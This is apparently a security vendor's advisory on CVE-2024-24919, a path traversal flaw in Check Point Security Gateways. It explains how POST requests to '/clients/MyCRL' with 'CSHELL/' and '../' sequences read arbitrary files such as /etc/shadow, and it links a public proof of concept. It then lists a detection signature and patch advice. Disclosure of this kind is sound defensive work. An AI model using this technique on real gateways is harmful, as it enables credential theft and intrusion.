Critical Path Traversal Vulnerability in Check Point Security Gateways (CVE-2024-24919)
Overview
The SonicWall Capture Labs threat research team became aware of an exploited-in-the-wild information disclosure vulnerability affecting the Check Point Security Gateways. Identified as CVE-2024-24919 and given a CVSSv3 score of 8.6, the vulnerability is more severe than it initially appears. While labeled as a sensitive information disclosure vulnerability, it is actually a path traversal attack leading to an arbitrary read, allowing an attacker to read any file on the system. A proof of concept is publicly available on GitHub. To be vulnerable, the gateway needs to have Remote Access VPN or Mobile Access Software Blades enabled. Check Point has made a patch available, and it is advisable to update immediately.
Technical Overview
The flaw is a path traversal bug in the “/clients/MyCRL” endpoint, which can be exploited via manipulated POST requests containing the string “CSHELL/” somewhere in the request. Due to the use of the “strstr” function without proper sanitizing and validation of user input, an attacker can leverage path traversal sequences like “../” within the POST request (Figure 1). This ultimately allows access to sensitive files like /etc/shadow, which contain the password hashes for the system. For our analysis, we used version R80.
Figure 1: Vulnerable Code
To trigger and exploit this vulnerability, an attacker must send a POST request containing the string “CSHELL/” and include a path traversal sequence like “../”. This can be done in Python, as shown in the publicly available PoC and Figure 2 below, where “path” is the file the attacker wants access to.
Figure 2: Creating a POST request to obtain sensitive information
Leveraging this code, we can demonstrate dumping the gateway’s “/etc/shadow” file to obtain the system’s hashed credentials, as seen in Figure 3. An attacker can then attempt to crack these hashes to obtain administrative access to the firewall. The attack allows access to any file on the system and is not limited. Note that this is being done against the WAN interface, showing that it is accessible over the Internet.
Figure 3: Dumping Hashed Credentials
SonicWall Protections
To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signatures have been released:
- IPS: 4440 Check Point Security Gateway Path Traversal
Remediation Recommendations
Check Point’s gateway users are advised to apply the hotfix found in the advisory immediately. Check Point has labeled this a mandatory patch to express the criticality of the fix.
Relevant Links
- https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog
- https://support.checkpoint.com/results/sk/sk182336
- https://github.com/LucasKatashi/CVE-2024-24919/blob/main/CVE-2024-24919.py